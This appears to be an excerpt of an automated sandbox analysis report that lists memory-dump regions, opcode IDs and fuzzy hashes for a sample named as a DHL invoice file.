                                                                                                                • Instruction ID: e2663fdc9b1735719a88de11f7b1a830920a928502c5703416080845fc0d0380
                                                                                                                • Opcode Fuzzy Hash: 5c464f83cf5f28dbe997d9300beb46cca6bb37afcad1ddd6cefba9a86817c812
                                                                                                                • Instruction Fuzzy Hash: F6F03F74E05228CFEFA0CF50C8487DABBB0BB5A302F0044E6D849A2241C7741EC8CF86
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: M
                                                                                                                • API String ID: 0-3664761504
                                                                                                                • Opcode ID: baae26bc854fd205ef0c8a10107514b9e1ebed73dc8cff5ad74ee679defe657e
                                                                                                                • Instruction ID: e4f0da0b1ab6cba75ebfa66789be85e9348bcfa1f3eba773fc45b4319be0cd4f
                                                                                                                • Opcode Fuzzy Hash: baae26bc854fd205ef0c8a10107514b9e1ebed73dc8cff5ad74ee679defe657e
                                                                                                                • Instruction Fuzzy Hash: 0BE0E5749052688FDB20CB24CC45BE9B7B1BB1A350F1046DAAA1DBB7C0D3B59E81CF44
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 8
                                                                                                                • API String ID: 0-4194326291
                                                                                                                • Opcode ID: 8e79023166b69cc30324d6eb1bb4a60d08941f8d8f202753d7f550d2d34c38c6
                                                                                                                • Instruction ID: 08cce52a1ff1560dd57d4cd2a11dba3aa1699a42b6cc928ff89047d7ad30801f
                                                                                                                • Opcode Fuzzy Hash: 8e79023166b69cc30324d6eb1bb4a60d08941f8d8f202753d7f550d2d34c38c6
                                                                                                                • Instruction Fuzzy Hash: AED02E74A4930E8FDB04EF20C9886AA7BBBBB81300F004864C8065B304CA3808488F00
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 8
                                                                                                                • API String ID: 0-4194326291
                                                                                                                • Opcode ID: 4f93fae0825ebabe7ef5eecbc2f0ed15a4d91fda5e81f39dd7e90b548771077c
                                                                                                                • Instruction ID: 08cce52a1ff1560dd57d4cd2a11dba3aa1699a42b6cc928ff89047d7ad30801f
                                                                                                                • Opcode Fuzzy Hash: 4f93fae0825ebabe7ef5eecbc2f0ed15a4d91fda5e81f39dd7e90b548771077c
                                                                                                                • Instruction Fuzzy Hash: AED02E74A4930E8FDB04EF20C9886AA7BBBBB81300F004864C8065B304CA3808488F00
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0b6be202944be94c1285a3e4c0e9997cba75b15ab91e192e4bc685cb51e8ff67
                                                                                                                • Instruction ID: e1bfa87ee950b7067dbbb592ee53133f77cd2da32a2fc3d6ffd8bd22a1460a8c
                                                                                                                • Opcode Fuzzy Hash: 0b6be202944be94c1285a3e4c0e9997cba75b15ab91e192e4bc685cb51e8ff67
                                                                                                                • Instruction Fuzzy Hash: 6CB15D70D08288CFCB14DFA9D5446ADBBF6FF4A705F208829E819AB355CB305A45DF54
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b62fd072381b6be7bc897d9e4f8d0397196b76e64736dd5265329a416fdb938e
                                                                                                                • Instruction ID: ea386fa12304de25a92304f97ba405c70242f1352ef1671bc7cc9e76c59062ba
                                                                                                                • Opcode Fuzzy Hash: b62fd072381b6be7bc897d9e4f8d0397196b76e64736dd5265329a416fdb938e
                                                                                                                • Instruction Fuzzy Hash: 2D917C35B012549FDB14DFA9D985AADBBB2FF88711F108869E902AB390CB35DE41CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e97c0c20ea0dd6c76c4d9d4dbb6d70329e29602b65a4759bb2f7ff7a6cc96de3
                                                                                                                • Instruction ID: 97352cb2bb01b27b2b0f9d5b03262a6075c612fb7dbc85700fb09be2deeb874e
                                                                                                                • Opcode Fuzzy Hash: e97c0c20ea0dd6c76c4d9d4dbb6d70329e29602b65a4759bb2f7ff7a6cc96de3
                                                                                                                • Instruction Fuzzy Hash: 35A15035E006398FDF11DFA5D894AEEBBB6FF48700F148815E811A7255DB389A46CF60
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 183b6161ffc6d4f0888dc095627d9c1d7e8f003e3fd72de6bbc137a4b94fc372
                                                                                                                • Instruction ID: 0acec95a14b7e395d2301ee8ecddf399151fbe84930c0e57f7ad4c08f589f44a
                                                                                                                • Opcode Fuzzy Hash: 183b6161ffc6d4f0888dc095627d9c1d7e8f003e3fd72de6bbc137a4b94fc372
                                                                                                                • Instruction Fuzzy Hash: F681E939A00628CFCB14DF69C58499EB7F6FF88710B1585A9E816DB361DB34ED42CB90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b013fe0dd482ae720ec6b6492df311ee88477b6cadd64d1c0e75561aae05540c
                                                                                                                • Instruction ID: 80a601f789d0e1846560a27e895e416d908f7d93ab2210a1d3c2d4dca8d53a26
                                                                                                                • Opcode Fuzzy Hash: b013fe0dd482ae720ec6b6492df311ee88477b6cadd64d1c0e75561aae05540c
                                                                                                                • Instruction Fuzzy Hash: DD714A74D05209CFDB05CFA9D584AADBBF2FF4A304F2084A9D825A7250D7309A85DF89
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 133a8dbc70730d3ccced23de1746a2a5928c8c3b2c2162bb31365ccfd338570e
                                                                                                                • Instruction ID: e49fb139ea8984f7e2d306c6890c67a38bbb508d433e43356f01a9593a23f3dd
                                                                                                                • Opcode Fuzzy Hash: 133a8dbc70730d3ccced23de1746a2a5928c8c3b2c2162bb31365ccfd338570e
                                                                                                                • Instruction Fuzzy Hash: B951C035B04255DFCB11CB69D885B6ABBB6FB88710F148C7AE915DB381CB35E802CB90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4493e59769abe63a4b698b858432651edf389c98a8c4657275c9cdffc73e93d7
                                                                                                                • Instruction ID: 67f455e3c680bcc1dfbf5bb4df4d39ed2dad1b94960e8fbf78ea282b7a07beac
                                                                                                                • Opcode Fuzzy Hash: 4493e59769abe63a4b698b858432651edf389c98a8c4657275c9cdffc73e93d7
                                                                                                                • Instruction Fuzzy Hash: 6B611674E05209CFDB04CFA9D984AEDBBF2FF49304F108469D825AB250DB74AA85CF95
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 29b4c6d3d05ad89cbe7fdbe5497cac993619b081a1c6a0fe5cc46c489826a6f2
                                                                                                                • Instruction ID: fcc3f448212e14f0e71411f68479f7953813132b70be50a5947ecff3a6e4a24f
                                                                                                                • Opcode Fuzzy Hash: 29b4c6d3d05ad89cbe7fdbe5497cac993619b081a1c6a0fe5cc46c489826a6f2
                                                                                                                • Instruction Fuzzy Hash: 54515E34B106199FCB149F64E459AAE7BBAFFC8715F004519F506973A4DF30A906CF82
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b3168615dffb919d73e92088954e8a7a39b4ff44a91712732a13ec033526a47c
                                                                                                                • Instruction ID: 5175e749bfce9d8b94166d9b7a6bd016609815182020079a9d72a812df0a11af
                                                                                                                • Opcode Fuzzy Hash: b3168615dffb919d73e92088954e8a7a39b4ff44a91712732a13ec033526a47c
                                                                                                                • Instruction Fuzzy Hash: 3A511974904218CFDB64DF19C889BA9BBB6BF8A300F1084E5E80DE7351DB745A84DF58
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9ee31e4162b703e2f8dc55541a0deffed88b2660b956220106eb2c80cea43f8b
                                                                                                                • Instruction ID: fbf3198a7fe67c261b2181a96614aa746cafac2b65fd9c557097bc21b3f26559
                                                                                                                • Opcode Fuzzy Hash: 9ee31e4162b703e2f8dc55541a0deffed88b2660b956220106eb2c80cea43f8b
                                                                                                                • Instruction Fuzzy Hash: 7B51E374E05209CFDB18CFA9C984A9DBBF2FF89304F20942AD809AB361DB709941DF44
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 950670c689b77495cd2f6f8d0b3ed9ccff77312a36bd9ca3b7a6c371c6681f51
                                                                                                                • Instruction ID: 4dd4946a565b03793f759e543bdd530d1d0d61954ed5134309541a515460c972
                                                                                                                • Opcode Fuzzy Hash: 950670c689b77495cd2f6f8d0b3ed9ccff77312a36bd9ca3b7a6c371c6681f51
                                                                                                                • Instruction Fuzzy Hash: 4341B474E05208CFDB18DFB9C984A9DBBF2BF89304F249569D819AB361DB719942CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7b6857a64e2f88b88a7c9e9b83cd4c552fe06f0ab9f4d7498064011615675cf4
                                                                                                                • Instruction ID: 8c6a94803889202122bc9dbc07ab9e5d89dc7627c4624265de1a3927557c3f1d
                                                                                                                • Opcode Fuzzy Hash: 7b6857a64e2f88b88a7c9e9b83cd4c552fe06f0ab9f4d7498064011615675cf4
                                                                                                                • Instruction Fuzzy Hash: B131D536A101149FCB05DF99D888EA9BBB6FF48320F1684A8F509AB372D731ED55DB40
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 493091a09ebe42288457e0f7b4689041ec8a378d55751d6e00e72fb234c5b183
                                                                                                                • Instruction ID: 937526d38839e65c2a0d25ec3d11b93f4e15f84c0f1c20af5f1ed9148e84ee9e
                                                                                                                • Opcode Fuzzy Hash: 493091a09ebe42288457e0f7b4689041ec8a378d55751d6e00e72fb234c5b183
                                                                                                                • Instruction Fuzzy Hash: 3E418F31A103658FCB14CFA5C884ABEBBB6FF84B01F108D2AD516D7290D738DA45CB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b8b94455d6079cbab7aee38943fd74b49365705849d24de7ae22777409e8b7b0
                                                                                                                • Instruction ID: cb455c49c4c9f2b07a0de4d94efb23c97ff0182525f786ba1f382b97ce36387d
                                                                                                                • Opcode Fuzzy Hash: b8b94455d6079cbab7aee38943fd74b49365705849d24de7ae22777409e8b7b0
                                                                                                                • Instruction Fuzzy Hash: 423137B0D002489FCB14DFA9C990AEEBBF5BF48314F248429E948AB250DB759945CFA4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2bc086f4f5df7c8a1f51495c670e0265deb66a5bf9267e53406a5a9383b9ae77
                                                                                                                • Instruction ID: 257028245b7c8768fdccf37a993474611806a6fdfe16e41586862e3291c6d5bc
                                                                                                                • Opcode Fuzzy Hash: 2bc086f4f5df7c8a1f51495c670e0265deb66a5bf9267e53406a5a9383b9ae77
                                                                                                                • Instruction Fuzzy Hash: 6B313874E04209CFDB14DFAAC480AAEBBF6BF8A300F10C469D815A7354DB349A459F65
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 85af3d4ef154a22cd2b0b6f8409f35f408f27c0fc5b9742db5ea50a882abda25
                                                                                                                • Instruction ID: cac568a92093ab5fcb4b5a75fa375a1e8ef8095c6ac4c43e51493a6806a44c3c
                                                                                                                • Opcode Fuzzy Hash: 85af3d4ef154a22cd2b0b6f8409f35f408f27c0fc5b9742db5ea50a882abda25
                                                                                                                • Instruction Fuzzy Hash: 2721F8323096509FD3259B6DE84466ABBA5EFC1315B1988BAD00EC7252DB31EC41C790
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1ee00cbbc4bedf4a5a39454cd02430b2af05f1aa819490afe41c3a7fc108e175
                                                                                                                • Instruction ID: aa1224c075ed09b8a8dc45b6e217d92079e5f8fbf1b13c849ff09e591b2652ee
                                                                                                                • Opcode Fuzzy Hash: 1ee00cbbc4bedf4a5a39454cd02430b2af05f1aa819490afe41c3a7fc108e175
                                                                                                                • Instruction Fuzzy Hash: 0F3158396107108FC7259F34D89496ABBB6FF85305B10886DE8468B7A0DF31E986CF60
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 22b1227c7dffa463d12821175e0c275a99e802cb167cfe41f64b73cd33ab653e
                                                                                                                • Instruction ID: 93e3cbcbd40a6cbd8d0e6be0270e623d8d7715f7d944e3386d9e32ed7eb64739
                                                                                                                • Opcode Fuzzy Hash: 22b1227c7dffa463d12821175e0c275a99e802cb167cfe41f64b73cd33ab653e
                                                                                                                • Instruction Fuzzy Hash: DD3124B0D002589FCB14CFAAC590AEEBFF5BF48310F248429E849AB250DB749945CFA0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ad60d7daf060736daca9bcb8fdf9d3b06e5e5f0a4ba68cc9e9e76cd6288d3c2a
                                                                                                                • Instruction ID: 3ecd20f4a99f8600d5e3db5ec8aafbaac5069bb795e6e5ceac8023994b2584b5
                                                                                                                • Opcode Fuzzy Hash: ad60d7daf060736daca9bcb8fdf9d3b06e5e5f0a4ba68cc9e9e76cd6288d3c2a
                                                                                                                • Instruction Fuzzy Hash: BB21D3767042258FCB209B68D848A7ABBB6FF84310B14492AF51ACB355DF34DD018B90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: dc5f62ebce11050acf6cd6ae7d746b8d0bf13934064269de0f5836be2f81119e
                                                                                                                • Instruction ID: d61c610dfc3f0d540257ef030f29c69fa4a2210925a918cb214727aaf560e53b
                                                                                                                • Opcode Fuzzy Hash: dc5f62ebce11050acf6cd6ae7d746b8d0bf13934064269de0f5836be2f81119e
                                                                                                                • Instruction Fuzzy Hash: F721C7317202059FC710DB68D9467AEBBF6FB88300F008979E00AD7759DF70A94A8B90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4908af1183bc0a78cb1aecaa344799229f352aabda50ca8601f8401159b9ec58
                                                                                                                • Instruction ID: 78be8dcca3a4cd50b034b7c32667defd5e41a948ae0a3e85b03f831510c0d028
                                                                                                                • Opcode Fuzzy Hash: 4908af1183bc0a78cb1aecaa344799229f352aabda50ca8601f8401159b9ec58
                                                                                                                • Instruction Fuzzy Hash: 46214C71E00229DFDF00DE7AC944BAEBBF5AB44240F108466D519D7291EA34EA85CBA1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2035854451.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_98d000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4279d9692c00d834727e196e38649d0f09cb6338f74913a20b2ddb30988849c2
                                                                                                                • Instruction ID: 8fb6b64e387ec11a2c67af4bde91c5167d372dc03ae3db5685eb8f2973db1b5a
                                                                                                                • Opcode Fuzzy Hash: 4279d9692c00d834727e196e38649d0f09cb6338f74913a20b2ddb30988849c2
                                                                                                                • Instruction Fuzzy Hash: 2F212271505240DFDB14EF14DAC4B26BFA9FB84324F20C569E9094B386C33AD84ACBA2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 695f52dae43f98f2e8bfc00ef6cdb65c10cacd2817b29dc0b10835f13cef9ea6
                                                                                                                • Instruction ID: 6346ce0c2fc40c0060e9e788babb45bc6ecfd6a6a06d0a829f45996fe15602ed
                                                                                                                • Opcode Fuzzy Hash: 695f52dae43f98f2e8bfc00ef6cdb65c10cacd2817b29dc0b10835f13cef9ea6
                                                                                                                • Instruction Fuzzy Hash: 88313970E00219DFCB04EFA8D894AEEBBB6FF49311F10852AE805A7364DB305949CF91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 49f1c54260a28fa30f869aafe1ab4e16891bc0d940469b899c5409bae70d0d95
                                                                                                                • Instruction ID: 909573a1cdfc24acf368f3aad8e84d798ff66640adfac1024dd276189c728c32
                                                                                                                • Opcode Fuzzy Hash: 49f1c54260a28fa30f869aafe1ab4e16891bc0d940469b899c5409bae70d0d95
                                                                                                                • Instruction Fuzzy Hash: A621C0353081648FDB149F3AC854BBD3F9EBF85611B08846AF896DB3A1CA34CD00DBA0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7ad46beb77e235de25d6615c2228624bb3a32c7f111a8db4e5a16852f1ee42b4
                                                                                                                • Instruction ID: 2f0d694e9542d0b5e41bf88e26cdcf3d6866f1d7daa8805a08d064f7037c2b4b
                                                                                                                • Opcode Fuzzy Hash: 7ad46beb77e235de25d6615c2228624bb3a32c7f111a8db4e5a16852f1ee42b4
                                                                                                                • Instruction Fuzzy Hash: E7217C39A01119DFCB00DBA8D584ADDBBF6FF88710F24452AF501E7360DB749900DB90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6e3f05990b2c42b5f11a42bd2264df70463c74467c978d0ac893c23f4ab9ad62
                                                                                                                • Instruction ID: 5769b0b241f61185321d7468b014b2d55b2a243b28b61d9e4808bf80355bd672
                                                                                                                • Opcode Fuzzy Hash: 6e3f05990b2c42b5f11a42bd2264df70463c74467c978d0ac893c23f4ab9ad62
                                                                                                                • Instruction Fuzzy Hash: F0213CB0918208DFEB04EFA8D8887BEBBF1FB49306F5580A5D419A3360E7744A84DB01
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 366e5c2ddbe7bec5a47c75fa9fa80e786ff78b109de588874d2997224f78d079
                                                                                                                • Instruction ID: 6d71087cdc14a43f4134c69c19c2fd4a5d98b9f427ef63313c9542588c1ec526
                                                                                                                • Opcode Fuzzy Hash: 366e5c2ddbe7bec5a47c75fa9fa80e786ff78b109de588874d2997224f78d079
                                                                                                                • Instruction Fuzzy Hash: 8521F735A401198FCB14DF94C945ADDB7F2FB48300F6005A4E405AB665CB75AE85CFA0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 446646d9c0af06e3eced2b4d26382925cd62311c081cdea0f8c6a7b884cfbca6
                                                                                                                • Instruction ID: 66ef887194716cc1e63733eab1dc652f5ea0abfa8cb17346b712bc47e2965976
                                                                                                                • Opcode Fuzzy Hash: 446646d9c0af06e3eced2b4d26382925cd62311c081cdea0f8c6a7b884cfbca6
